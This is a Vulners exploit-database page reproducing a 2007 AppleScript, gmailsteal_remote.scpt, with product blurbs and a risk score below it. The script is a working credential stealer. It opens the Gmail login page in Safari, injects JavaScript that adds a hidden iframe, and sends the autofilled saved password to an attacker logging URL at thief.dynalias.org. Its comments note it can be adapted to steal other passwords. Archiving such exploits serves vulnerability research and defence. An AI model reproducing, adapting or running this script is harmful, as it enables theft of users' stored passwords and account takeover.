Vulners
Lucene search
gmailsteal_remote.scpt.txt
`-- This script can be used to steal gmail's keychained password by injecting
-- Javascripts into Safari. When executed it opens gmail's login page, reads
-- saved password and sends it to a logging server by creating an hidden iframe
-- into gmail's page. It can be easly modified to steal other pass.
-- poplix papuasia.org -- http://px.dynalias.org -- 09-22-2007
--Your logging server
set LOGGING_URL to "http://thief.dynalias.org/log.php?p="
--Creates an hidden iframe into google's login DIV
set HIDDENFRAME to "document.getElementById('login').innerHTML+='<iframe id=steal width=0 height=0></iframe>'"
--Stealing code
set JSTEAL to "document.getElementById('steal').src='" & LOGGING_URL & "'+document.getElementById('gaia_loginform').Passwd.value"
--Open gmail login page
tell application "Safari"
open location "https://www.google.com/accounts/ServiceLogin?service=mail"
end tell
--Wait loading...
delay 10
--Create an hidden iframe to load LOGGING_URL
tell application "Safari"
do JavaScript HIDDENFRAME in document 1
end tell
delay 1
--Send password to LOGGING_URL
tell application "Safari"
do JavaScript JSTEAL in document 1
end tell
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Sep 2007 00:00Current
7.4High risk
Vulners AI Score7.4